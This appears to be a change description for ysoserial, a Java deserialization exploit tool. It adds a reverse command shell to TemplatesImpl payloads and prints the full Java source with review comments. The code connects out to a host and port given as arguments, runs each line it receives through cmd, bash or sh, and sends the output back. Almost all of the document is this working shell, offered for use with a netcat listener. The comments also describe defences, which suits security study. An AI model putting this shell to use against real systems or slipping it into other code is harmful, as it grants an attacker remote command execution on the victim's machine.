ysoserial
Added reverse shell capability for TemplatesImpl payloads.
Added a simple reverse command shell that also supports pipe and redirection shell operators. It works with, for example, a netcat listener. For ease of reading and review, the shell code is as follows:
// Statement sequence (the enclosing method and the declaration of `args` are not
// part of this listing). It opens a TCP connection to host args[0], port args[1],
// reads text lines from that connection, runs each line through an operating-system
// shell, and writes the combined stdout/stderr of the child back over the same
// connection until the line "exit" is received.
//
// Behaviour that is observable from the outside, as established by the code below:
//   - the JVM process initiates an outbound TCP connection;
//   - the JVM process becomes the parent of `cmd /c "<line>"` when os.name contains
//     "win", otherwise of `/bin/bash -c <line>`, with `/bin/sh -c <line>` as fallback;
//   - the bytes "> " and the prefix "[-] Exception: " are written to the socket as-is;
//     this code adds no TLS and no authentication on top of the raw socket streams.
// NOTE(review): per the page title this is delivered through TemplatesImpl
// deserialization payloads, so the relevant controls are filtering/denying
// deserialization of untrusted data, process-creation telemetry on JVM hosts
// (shell child under a java parent), and egress filtering.
java.net.Socket sck = null;
java.io.OutputStream out;
java.io.BufferedReader rdr;
Process proc;
String cmd = "";
// Lower-cased with a fixed locale so the "win" substring test below does not depend
// on the host's default locale.
String os = System.getProperty("os.name").toLowerCase(java.util.Locale.ENGLISH);
try {
// Outbound connection: host and port are taken from args[0] and args[1].
sck = new java.net.Socket(java.net.InetAddress.getByName(args[0]), Integer.parseInt(args[1]));
out = sck.getOutputStream();
// No charset is passed, so the reader decodes with the platform default charset.
rdr = new java.io.BufferedReader(new java.io.InputStreamReader(sck.getInputStream()));
// Loop until the most recently read line, trimmed and lower-cased, equals "exit".
while(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
try {
// Prompt sent to the peer before every read.
out.write("> ".getBytes(), 0, "> ".getBytes().length);
// readLine() returns null at end of stream; the cmd.trim() calls that follow then
// throw NullPointerException (first inside this try, then in the while condition,
// which is only covered by the outer catch that closes the socket).
cmd = rdr.readLine();
if(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
if(os.contains("win")) {
// Windows branch: the received line is wrapped in double quotes and handed to cmd /c.
// redirectErrorStream(true) merges stderr into stdout.
proc = new ProcessBuilder("cmd", "/c", "\"" + cmd.trim() + "\"").redirectErrorStream(true).start();
} else {
try {
// Non-Windows branch: /bin/bash -c is tried first.
proc = new ProcessBuilder("/bin/bash", "-c", cmd.trim()).redirectErrorStream(true).start();
} catch(java.io.IOException ioe) {
// The exception message text is used to tell "binary could not be started" apart
// from other I/O errors; only the former triggers the /bin/sh fallback.
if(ioe.getMessage().contains("Cannot run program")) {
try {
proc = new ProcessBuilder("/bin/sh", "-c", cmd.trim()).redirectErrorStream(true).start();
} catch(java.io.IOException ioe2) {
if(ioe2.getMessage().contains("Cannot run program")) {
throw new java.io.IOException("Non-Windows target and neither /bin/bash or /bin/sh is present.");
} else {
throw ioe2;
}
}
} else {
throw ioe;
}
}
}
// Blocks until the child exits, then forwards only the bytes that available()
// reports at that moment; the return value of read(b) is not checked.
proc.waitFor();
byte[] b = new byte[proc.getInputStream().available()];
proc.getInputStream().read(b);
out.write(b);
}
} catch(Exception ex) {
// Any per-command failure is reported to the peer as text and the loop continues.
out.write(("[-] Exception: " + ex.toString()).getBytes());
}
}
sck.close();
} catch(Exception ex) {
// Connection-level failure: close the socket if it was opened. The failure itself
// is not logged or rethrown, and an error from close() is ignored as well.
if(sck != null) {
try {
sck.close();
} catch(Exception ex2) {}
}
}